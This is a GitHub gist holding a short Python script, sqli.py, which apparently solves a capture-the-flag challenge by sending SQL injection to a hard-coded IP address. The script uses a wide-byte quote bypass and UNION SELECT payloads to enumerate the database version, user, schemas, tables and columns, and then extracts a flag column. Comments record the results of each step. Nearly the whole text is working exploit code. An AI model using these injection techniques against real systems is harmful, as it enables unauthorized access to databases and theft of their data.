Created
May 15, 2016 03:16
-
-
Save virusdefender/02900afbb0b66ffd835538feb98079ff to your computer and use it in GitHub Desktop.
sqli.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# coding=utf-8 | |
import requests | |
import urllib | |
import re | |
regex = r = re.compile("<h1>([\s\S]*)</h1>") | |
base_url = "http://139.129.166.67/5t5y6huj7j7/?id=%bf%27 " | |
def get(payload): | |
response = requests.get(base_url + urllib.quote("%s -- " % payload)).content | |
print response | |
return regex.findall(response) | |
''' | |
print get("union select 1, version()") | |
# 5.1.73 | |
print get("union select 1, database()") | |
# test | |
print get("union select 1, user()") | |
# shadow@localhost | |
print get("union select 1, count(*) from information_schema.schemata") | |
# 2 | |
for i in range(2): | |
print get("union select 1, schema_name from information_schema.schemata limit 1 offset %d" % i) | |
# 'information_schema' 'test' | |
for i in range(2): | |
print get("union select 1, table_name from information_schema.tables where table_schema=0x74657374 limit 1 offset %d" % i) | |
# 'article' 'flag' | |
for i in range(5): | |
print get("union select 1, column_name from information_schema.columns where table_name=0x666c6167 and table_schema=0x74657374 limit 1 offset %d" % i) | |
# 'id' 'thisisflag' | |
''' | |
print get("union select 1, convert(thisisflag,char) from test.flag limit 1 offset 0") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment